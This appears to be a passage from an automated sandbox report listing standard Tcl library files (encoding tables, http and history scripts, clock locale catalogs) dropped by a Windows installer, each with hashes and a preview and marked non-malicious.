                                                                                                                                SHA-512:BF98305AA7D759A087B9EABDC404714D8DC6B4F1BEED4ED0E1FFE646641E1AECA307673D64CF95FD09546D977B3409D6C04F56DCCA1D6332B0D9B6DD460B77A9
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Encoding file: tis-620, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F..0E400E410E420E430E44
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8235
                                                                                                                                Entropy (8bit):4.855903177272536
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Hf8PxPu7pUHBpqyzmY5rEk/fvs+AokFlTGHts1H/tsEGZPBtsLIVn++G:H6Pu7ELJTtyli8Ozz+L
                                                                                                                                MD5:8609B624CD3EC63DD02DBF89455C3A9B
                                                                                                                                SHA1:B3E1843E34C38AA668FFDDF435A1A65D55449CA0
                                                                                                                                SHA-256:5123DB837EADF45712EA7D449BC40BFD3E8E16D3D71E7D0CE9A32F164973D767
                                                                                                                                SHA-512:B20B75473F34209888F38EE570B8A96061760E88466DFC2EC55C814968DC7F67D92D255E8635188B60455B88F2D1D517747613AD0F366D60412D2D6ECE231B0E
                                                                                                                                Malicious:false
                                                                                                                                Preview:# history.tcl --..#..# Implementation of the history command...#..# Copyright (c) 1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#.....# The tcl::history array holds the history list and some additional..# bookkeeping variables...#..# nextid.the index used for the next history list item...# keep..the max size of the history list..# oldest.the index of the oldest item in the history.....namespace eval ::tcl {.. variable history.. if {![info exists history]} {...array set history {... nextid.0... keep.20... oldest.-20...}.. }.... namespace ensemble create -command ::tcl::history -map {...add.::tcl::HistAdd...change.::tcl::HistChange...clear.::tcl::HistClear...event.::tcl::HistEvent...info.::tcl::HistInfo...keep.::tcl::HistKeep...nextid.::tcl::HistNextID...redo.::tcl::HistRedo.. }..}.....# history --..#..#.This is the main history command. See the
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):10066
                                                                                                                                Entropy (8bit):4.806771544139381
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:kipkqA3KsZMAikGJ4kIWPa95KTBoF7dg/8YNkgQ4id:TkqWKsZ8kGJ4kIWPaDFzTd
                                                                                                                                MD5:C2092F8CA2D761DFA8C461076D956374
                                                                                                                                SHA1:90B4648B3BC81C30465B0BE83A5DB4127A1392FB
                                                                                                                                SHA-256:8C474095A3ABA7DF5B488F3D35240D6DE729E57153980C2A898728B8C407A727
                                                                                                                                SHA-512:09CE408886E2CEADDF70786A15D63AF9A930E70CAC4286AC9DDD2094C8EDCF97A2ADC2D3D2659B123F88719340D3B00D9F96E9BC7C8B55192735C290E7D24683
                                                                                                                                Malicious:false
                                                                                                                                Preview:# http.tcl..# Client-side HTTP for GET, POST, and HEAD commands...# These routines can be used in untrusted code that uses the Safesock..# security policy...# These procedures use a callback interface to avoid using vwait,..# which is not defined in the safe base...#..# See the http.n man page for documentation....package provide http 1.0....array set http {.. -accept */*.. -proxyhost {}.. -proxyport {}.. -useragent {Tcl http client package 1.0}.. -proxyfilter httpProxyRequired..}..proc http_config {args} {.. global http.. set options [lsort [array names http -*]].. set usage [join $options ", "].. if {[llength $args] == 0} {...set result {}...foreach name $options {... lappend result $name $http($name)...}...return $result.. }.. regsub -all -- - $options {} options.. set pat ^-([join $options |])$.. if {[llength $args] == 1} {...set flag [lindex $args 0]...if {[regexp -- $pat $flag]} {... return $http($flag)...} else {... return -code er
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):746
                                                                                                                                Entropy (8bit):4.711041943572035
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:jHx5XRsLzhjJS42wbGlTULuUAZb3KykszLl7+HkuRz20JSv6C3l5kMn:bHRsRJS42wbGlTUcZ+yk2Lli1z2jxXkM
                                                                                                                                MD5:A387908E2FE9D84704C2E47A7F6E9BC5
                                                                                                                                SHA1:F3C08B3540033A54A59CB3B207E351303C9E29C6
                                                                                                                                SHA-256:77265723959C092897C2449C5B7768CA72D0EFCD8C505BDDBB7A84F6AA401339
                                                                                                                                SHA-512:7AC804D23E72E40E7B5532332B4A8D8446C6447BB79B4FE32402B13836079D348998EA0659802AB0065896D4F3C06F5866C6B0D90BF448F53E803D8C243BBC63
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Tcl package index file, version 1.0..# This file is generated by the "pkg_mkIndex" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....package ifneeded http 1.0 [list tclPkgSetup $dir http 1.0 {{http.tcl source {httpCopyDone httpCopyStart httpEof httpEvent httpFinish httpMapReply httpProxyRequired http_code http_config http_data http_formatQuery http_get http_reset http_size http_status http_wait}}}]..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25633
                                                                                                                                Entropy (8bit):4.8854383645737895
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:rXugPHudKlExBG+Xg3Qonlm6ofRRECLSQDjr5vkhzx/i:ygGdKli4eonlm6offLzehNi
                                                                                                                                MD5:982EAE7A49263817D83F744FFCD00C0E
                                                                                                                                SHA1:81723DFEA5576A0916ABEFF639DEBE04CE1D2C83
                                                                                                                                SHA-256:331BCF0F9F635BD57C3384F2237260D074708B0975C700CFCBDB285F5F59AB1F
                                                                                                                                SHA-512:31370D8390C4608E7A727EED9EE7F4C568ECB913AE50184B6F105DA9C030F3B9F4B5F17968D8975B2F60DF1B0C5E278512E74267C935FE4EC28F689AC6A97129
                                                                                                                                Malicious:false
                                                                                                                                Preview:# init.tcl --..#..# Default system startup file for Tcl-based applications. Defines..# "unknown" procedure and auto-load facilities...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 1998-1999 Scriptics Corporation...# Copyright (c) 2004 Kevin B. Kenny. All rights reserved...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# This test intentionally written in pre-7.5 Tcl..if {[info commands package] == ""} {.. error "version mismatch: library\nscripts expect Tcl version 7.5b1 or later but the loaded version is\nonly [info patchlevel]"..}..package require -exact Tcl 8.6.12....# Compute the auto path to use in this interpreter...# The values on the path come from several locations:..#..# The environment variable TCLLIBPATH..#..# tcl_library, which is the directory containing this init.tcl script...# [t
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1038
                                                                                                                                Entropy (8bit):4.10054496357204
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:4EnLB383Hcm0hH9BncmtR7tK9dUVxMmALfpKIdzVJLd3xfjTuLM+vzkHWZ6tH9H0:4aR838HH9ekCkMmEfpK2xx2jiWZ0VbY
                                                                                                                                MD5:DA8BA1C3041998F5644382A329C3C867
                                                                                                                                SHA1:CA0BD787A51AD9EDC02EDD679EEEEB3A2932E189
                                                                                                                                SHA-256:A1EACA556BC0CFBD219376287C72D9DBBFAB76ECF9BF204FD02D40D341BAF7DA
                                                                                                                                SHA-512:4F086396405FDFE7FBDA7614D143DE9DB41F75BDBD3DB18B1EE9517C3DCCED238DD240B4B64829FD04E50F602DBF371D42A321D04C4C48E4B8B2A067CA1BAF2E
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset af DAYS_OF_WEEK_ABBREV [list \.. "So"\.. "Ma"\.. "Di"\.. "Wo"\.. "Do"\.. "Vr"\.. "Sa"].. ::msgcat::mcset af DAYS_OF_WEEK_FULL [list \.. "Sondag"\.. "Maandag"\.. "Dinsdag"\.. "Woensdag"\.. "Donderdag"\.. "Vrydag"\.. "Saterdag"].. ::msgcat::mcset af MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset af MONTHS_FULL [list \.. "Januarie"\.. "Februarie"\.. "Maart"\.. "April"\.. "Mei"\.. "Junie"\.. "Julie"\.. "Augustus"\.. "September"\.. "Oktober"\.. "November"\.. "Desember"\.. ""].. ::msgcat::mcset af AM "VM
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):257
                                                                                                                                Entropy (8bit):4.925537696653838
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:SlSyEtJLl73oo6d3/xouFygMouFqF3v6ay/5ouFy9+3vR6HyFvn:4EnLB383RAgeYF3v6ay/RAI3voSVn
                                                                                                                                MD5:1B9DCD1C6FCDDC95AE820EA8DA5E15B8
                                                                                                                                SHA1:E8160353FD415BAB9FD5ACCA14E087C5E6AE836E
                                                                                                                                SHA-256:1548988458BBF0DFCCC23B7487CEC0E9C64E4CC8E045723E50BEC37C454A8C81
                                                                                                                                SHA-512:532AF060B95AED5E381B161BE56BC88D91A8F3DF2ACFD835491991F99FE752ADB4A3F93AB6D4E68F7042C28A3C1DD87A6312DFD9FFFAFD6ECE3F1B76837C5B7F
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset af_ZA DATE_FORMAT "%d %B %Y".. ::msgcat::mcset af_ZA TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset af_ZA DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2018
                                                                                                                                Entropy (8bit):4.477377447232708
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:4aR83gr/fsS/Sm8p4M/n1KsPktE30AiJcAxi9CEzdEvSCHvMSV:43UkiSm8p3nX0EzdCSCPV
                                                                                                                                MD5:D264D01B46D96455715114CAEDF9F05E
                                                                                                                                SHA1:A3F68A4C6E69433BD53E52B73041575F3B3AC3F2
                                                                                                                                SHA-256:B69D0061A728D59F89FF8621312789CD9F540BF2E2ED297804D22F6278561D85
                                                                                                                                SHA-512:A4163DAA6821B293EADD5D499E0641A8B7C93180C710D6B364AE8681A8FF6F35EC948C8DDBE960A8466AF1ACABC15B0D465A08B084617E8005D708459F7E74D3
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar DAYS_OF_WEEK_ABBREV [list \.. "\u062d"\.. "\u0646"\.. "\u062b"\.. "\u0631"\.. "\u062e"\.. "\u062c"\.. "\u0633"].. ::msgcat::mcset ar DAYS_OF_WEEK_FULL [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar MONTHS_ABBREV [list \.. "\u064a\u0646\u0627"\.. "\u0641\u0628\u0631"\.. "\u0645\u0627\u0631"\.. "\u0623\u0628\u0631"\.. "\u0645\u0627\u064a"\.. "\u064a\u0648\u0646"\.. "\u064a\u0648\u0644"\.. "\u0623\u063a\u0633"\.. "\u0633\u0628\u062a"\..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):265
                                                                                                                                Entropy (8bit):4.872222510420193
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:SlSyEtJLl73oo6d3/xoKNvfcoKU3v6xyFjoKNo+3vfXM68vn:4EnLB3831vfD3v6g9F3vfc6+n
                                                                                                                                MD5:430498B4AB1E77C86BC1311A49747581
                                                                                                                                SHA1:684EAD965D9010C2A6E73DCACB2224FDE585F9FF
                                                                                                                                SHA-256:2E04B96DA002519D28125918A22FF2BB9659A668A7BCAD34D85DDDECEC8DC0B4
                                                                                                                                SHA-512:9F85A88A383DCFC54DAA6253D94C307A14B1CC91D5C97AF817B8122AF98025AB2430D0B2D656EBED09E78FB854D1F9CF99F3B791A6ECB7834112012739140126
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_IN DATE_FORMAT "%A %d %B %Y".. ::msgcat::mcset ar_IN TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset ar_IN DATE_TIME_FORMAT "%A %d %B %Y %I:%M:%S %z %z"..}..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1851
                                                                                                                                Entropy (8bit):4.08645484776227
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:4aR83sxS/Sm819+es/Ii/R91bpH0+U0c+es/Ii/R91bpH0+UO:43wiSm815MbJbHgMbJbp
                                                                                                                                MD5:5C62D606F4F14BC8994B28F9622D70DD
                                                                                                                                SHA1:E99F8CC5D330085545B05B69213E9D011D436990
                                                                                                                                SHA-256:5ADBB3D37C3369E5FC80D6A462C82598D5A22FAEF0E8DF6B3148231D2C6A7F73
                                                                                                                                SHA-512:81AC9200459B0896E27A028BD089A174F7F921B0367BC8FF1AB33D3E561417B6F8EC23DAB750ECB408AC8A11CDFDBFA4F890F9E723BB8607B017C9FEE00928A0
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_JO DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_JO MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1851
                                                                                                                                Entropy (8bit):4.083347689510237
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:4aR83LxS/Sm8S9+es/Ii/R91bpH0+U/c+es/Ii/R91bpH0+UO:431iSm8S5MbJbQgMbJbp
                                                                                                                                MD5:6FC1CC738207E2F8E0871103841BC0D4
                                                                                                                                SHA1:D2C62C7F6DA1EF399FCBE2BA91C9562C87E6152F
                                                                                                                                SHA-256:1FC13070CF661488E90FECE84274C46B1F4CC7E1565EAB8F829CCAA65108DFCA
                                                                                                                                SHA-512:E547D5CBB746654051AFDA21942075BC2224C2FF75D440C6C34C642AD24CF622E520FF919B8BD4AFC0116D9CE69B3ABA4E81EE247C1388F3C5741150201F5C60
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_LB DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_LB MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1851
                                                                                                                                Entropy (8bit):4.084701680556524
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:4aR83lxS/Sm8M9+es/Ii/R91bpH0+UBc+es/Iv/I91bpH0+UO:43LiSm8M5MbJbSgMo0bp
                                                                                                                                MD5:8188C37CA44FEFFF8D895AAD503AD4F6
                                                                                                                                SHA1:C48F2E3B9FC055704D2DAFDC67E9D08EE6897D45
                                                                                                                                SHA-256:294F3E46C55453EDAD44567E1330F9B43E69A07FA0655B24DD2780A4490C1194
                                                                                                                                SHA-512:F86FCFC7C460473D46C472041AB2E1F9388CF34BCA9050295D1DAE454E35A2A0320D0C61D5E8CBB832AF74FFDD1A7511AF32EA2A53B481F39A1CBCF5F086D514
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_SY DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_SY MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2157
                                                                                                                                Entropy (8bit):4.27810535662921
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:43PI8IKQGQ8mA/XxQJxQnA9QJlPyI/tbCaQICMIcQ8InVI5tNIzQFIQQLtChjsI4:2PItK5BSb9ajfycCW5IzdQNxK
                                                                                                                                MD5:6334BDDFC1E0EAE4DBB2C90F85818FD8
                                                                                                                                SHA1:085EDC3D027D6B5A6A6A2561717EA89C8F8B8B39
                                                                                                                                SHA-256:A636A82C7D00CCDC0AF2496043FFA320F17B0D48A1232708810D3BB1453E881E
                                                                                                                                SHA-512:18ADB77314FCFD534E55B234B3A53A0BC572AB60B80D099D2F3B20E0C5FE66179FDC076AA43200DB3CA123BC6216989EC41448FA624D3BA9633413AD8AD6034C
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset be DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0434"\.. "\u043f\u043d"\.. "\u0430\u0442"\.. "\u0441\u0440"\.. "\u0447\u0446"\.. "\u043f\u0442"\.. "\u0441\u0431"].. ::msgcat::mcset be DAYS_OF_WEEK_FULL [list \.. "\u043d\u044f\u0434\u0437\u0435\u043b\u044f"\.. "\u043f\u0430\u043d\u044f\u0434\u0437\u0435\u043b\u0430\u043a"\.. "\u0430\u045e\u0442\u043e\u0440\u0430\u043a"\.. "\u0441\u0435\u0440\u0430\u0434\u0430"\.. "\u0447\u0430\u0446\u0432\u0435\u0440"\.. "\u043f\u044f\u0442\u043d\u0456\u0446\u0430"\.. "\u0441\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset be MONTHS_ABBREV [list \.. "\u0441\u0442\u0434"\.. "\u043b\u044e\u0442"\.. "\u0441\u043a\u0432"\.. "\u043a\u0440\u0441"\.. "\u043c\u0430\u0439"\.. "\u0447\u0440\u0432"\.. "\u043b\u043f\u043d"
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1871
                                                                                                                                Entropy (8bit):4.4251657008559935
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:43EUAIlnQf/QVdQ81mnEZqEavWQEQ3QvQrQL0QjQTtQDCQSY4tqP:27xMk+nEZqE3biIYbUi+C9y
                                                                                                                                MD5:E5225D6478C60E2502D18698BB917677
                                                                                                                                SHA1:52D611CB5351FB873D2535246B3A3C1A37094023
                                                                                                                                SHA-256:CFE4E44A3A751F113847667EC9EA741E762BBDE0D4284822CB337DF0F92C1ACA
                                                                                                                                SHA-512:59AB167177101088057BF4EE0F70262987A2177ECB72C613CCAAE2F3E8D8B77F07D15DA5BE3B8728E23C31A1C9736030AA4036A8CD00A24791751A298B3A88B3
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bg DAYS_OF_WEEK_ABBREV [list \.. "\u041d\u0434"\.. "\u041f\u043d"\.. "\u0412\u0442"\.. "\u0421\u0440"\.. "\u0427\u0442"\.. "\u041f\u0442"\.. "\u0421\u0431"].. ::msgcat::mcset bg DAYS_OF_WEEK_FULL [list \.. "\u041d\u0435\u0434\u0435\u043b\u044f"\.. "\u041f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\.. "\u0412\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0421\u0440\u044f\u0434\u0430"\.. "\u0427\u0435\u0442\u0432\u044a\u0440\u0442\u044a\u043a"\.. "\u041f\u0435\u0442\u044a\u043a"\.. "\u0421\u044a\u0431\u043e\u0442\u0430"].. ::msgcat::mcset bg MONTHS_ABBREV [list \.. "I"\.. "II"\.. "III"\.. "IV"\.. "V"\.. "VI"\.. "VII"\.. "VIII"\.. "IX"\.. "X"\.. "XI"\.. "XII"\.. ""].. ::msgcat::mcset bg MO
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2335
                                                                                                                                Entropy (8bit):4.107102006297273
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:4aR835e/MWrD//6HFEVcVVcCVcTUTVckVEVcT7VcEEVcby/Vcn0VcMr/0VcM8VcQ:43ktX++QalMObalMZ6IE6V
                                                                                                                                MD5:5D25E7FC65824AC987535FEA14A4045C
                                                                                                                                SHA1:85C10F05823CD3263FC7B3EC38796BEC261B3716
                                                                                                                                SHA-256:890EA6521DEB1B3C3913CCD92562F6360E064DAEE2E2B0356A6DD97A46264A1F
                                                                                                                                SHA-512:5D8A88ACAEBBF3CD721F288FA0F1FEE517EE568CA5482E30CFA1E36CD37DF011C449090E2D9041F1D046A191F13D4C5C4B6F9E2F16FD259E63CE46ECC4E4F81F
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bn DAYS_OF_WEEK_ABBREV [list \.. "\u09b0\u09ac\u09bf"\.. "\u09b8\u09cb\u09ae"\.. "\u09ae\u0999\u0997\u09b2"\.. "\u09ac\u09c1\u09a7"\.. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf"\.. "\u09b6\u09c1\u0995\u09cd\u09b0"\.. "\u09b6\u09a8\u09bf"].. ::msgcat::mcset bn DAYS_OF_WEEK_FULL [list \.. "\u09b0\u09ac\u09bf\u09ac\u09be\u09b0"\.. "\u09b8\u09cb\u09ae\u09ac\u09be\u09b0"\.. "\u09ae\u0999\u0997\u09b2\u09ac\u09be\u09b0"\.. "\u09ac\u09c1\u09a7\u09ac\u09be\u09b0"\.. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf\u09ac\u09be\u09b0"\.. "\u09b6\u09c1\u0995\u09cd\u09b0\u09ac\u09be\u09b0"\.. "\u09b6\u09a8\u09bf\u09ac\u09be\u09b0"].. ::msgcat::mcset bn MONTHS_ABBREV [list \.. "\u099c\u09be\u09a8\u09c1\u09df\u09be\u09b0\u09c0"\.. "\u09ab\u09c7\u09ac\u09cd\u09b0\u09c1\u09df\u09be
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):265
                                                                                                                                Entropy (8bit):4.868201122972066
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:SlSyEtJLl73oo6d3/xovtvfluo/E3v6xyFjovto+3vflm68vn:4EnLB383UtvfltE3v6g8tF3vflm6+n
                                                                                                                                MD5:B91BB2ABC23B90962D2070B9588F2AB5
                                                                                                                                SHA1:CBB4E9CD600773792C6E9F3E6B27E99C1846B44F
                                                                                                                                SHA-256:B3D8A4632290B0F3DA690E47C1FDF06A8B9E171A96E938AFDB0DD52CF806CE54
                                                                                                                                SHA-512:932FC4B8C3CA72731187D56012AD7DD7777C4D447F16EEB17B9D68235C9590DF99992FD22B8D7C85A843A610F93CD36FAFA993C34C441255A1C0A93C73BC5FE4
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bn_IN DATE_FORMAT "%A %d %b %Y".. ::msgcat::mcset bn_IN TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset bn_IN DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z"..}..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1152
                                                                                                                                Entropy (8bit):4.2880653012847985
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:4aR83FMVBNfPg+g+RjMu5+C6MB4zdiwvWvn:432g6jh65zd3gn
                                                                                                                                MD5:72DDD60C907DD235BCE4AB0A5AEE902C
                                                                                                                                SHA1:06150F793251687E6FBC3FDA3BC81BCBFC7DE763
                                                                                                                                SHA-256:3BE295DCC8FCDC767FED0C68E3867359C18E7E57D7DB6C07236B5BC572AD328E
                                                                                                                                SHA-512:3B0A85003692F1E46185D5CC09236D2DA5E6D29166C9812D07A7D6BF6AC6C3B0708F91C6899768D4DBA3528081B8B43E09F49622B70F1CF991AFAC5352B6BA37
                                                                                                                                Malicious:false
